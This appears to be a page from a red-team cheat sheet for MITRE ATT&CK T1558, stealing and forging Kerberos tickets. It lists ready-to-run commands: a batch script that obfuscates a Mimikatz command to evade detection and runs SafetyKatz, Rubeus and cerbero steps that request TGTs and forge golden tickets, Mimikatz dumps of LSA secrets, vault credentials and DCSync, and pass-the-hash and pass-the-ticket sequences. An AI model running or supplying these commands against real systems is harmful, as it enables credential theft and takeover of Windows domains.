Mitre Att&ck Entreprise: T1558 Steal and Forge Kerberos Tickets
Menu
Which OS? What Creds?
Tools
| _repo | _last_pushed | _stars | _watch | _language |
|---|
1. command-obfuscation
REM script file to obfuscate the token manipulation commands
@echo off
set "z=s"
set "y=y"
set "x=e"
set "w=k"
set "v=e"
set "u=:"
set "t=:"
set "s=a"
set "r=s"
set "q=l"
set "p=r"
set "o=u"
set "n=k"
set "m=e"
set "l=s"
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"
echo %Pwn%
C:\Users\Public\SafetyKatz.exe %Pwn% exit
2. cleartext-2-nthash
# compute nthash from clear-text password
cerbero hash $ztarg_user_pass -u $zdom_fqdn/$ztarg_user_name
$ztarg_user_nthash=""
$ztarg_user_aes256k=""
3. get-tgt
cerbero ask -u $zdom_fqdn/$ztarg_user_name@ztarg_dc_fqdn --aes $ztarg_user_aes256k -k $zdom_dc_ip -vv
cerbero ask -u $zdom_fqdn/$ztarg_user_name@ztarg_computer_fqdn --aes $ztarg_user_aes256k -k $zdom_dc_ip -vv
./Rubeus.exe asktgt /user:$ztarg_user_name /password:$ztarg_user_pass /domain:$zdom /dc:$zdom_dc_fqdn /ptt
Invoke-Mimi -Command '"sekurlsa::ekeys"'
4. golden
# contains secrets for the: scheduled tasks, ...
Rubeus.exe -args golden /aes256:$ztarg_user_hash /sid:$ztarg_user_sid /ldap /user:$ztarg_user_name /printcmd
5. vault
# contains secrets for the: scheduled tasks, ...
Invoke-Mimi -Command '"token::elevate" "vault::cred /patch"'
6. lsadump-lsa
# dump lsa process
Invoke-Mimi -Command '"token::elevate" "lsadump::lsa /patch"'
7. lsadump-dcsync
# dcsync
Invoke-Mimi -Command '"token::elevate" "lsadump::dcsync"'
8. ccache-convert
# Convert linux to windows krb ticket :
ticketConverter.py $ztarg_user_name".ccache" $ztarg_user_name".krb"
cerbero convert -i $ztarg_user_name".ccache" -o $ztarg_user_name".krb"
9. krb-export
cd C:\tools\mimikatz\x64
mimikatz.exe privilege:debug
kerberos::list /export
10. krb-pth
# run powershell with pass-the-hash
mimikatz.exe
privilege::debug
sekurlsa::pth /user:$zlat_user /rc4:xxx /domain:$zdom /dc:$zdom_dc_fqdn /run:"powershell -ep bypass"
# opth
Rubeus.exe -args %Pwn% /user:$ztarg_user_name /aes256:$ztarg_user_hash /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
11. krb-ptt
# Request a TGT as the target user and pass it into the current session
# NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs
.\Rubeus.exe asktgt /user:$ztarg_user_name /rc4:$ztarg_user_hash /ptt
# Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation)
.\Rubeus.exe asktgt /user:$ztarg_user_name /rc4:$ztarg_user_hash /createnetonly:C:\Windows\System32\cmd.exe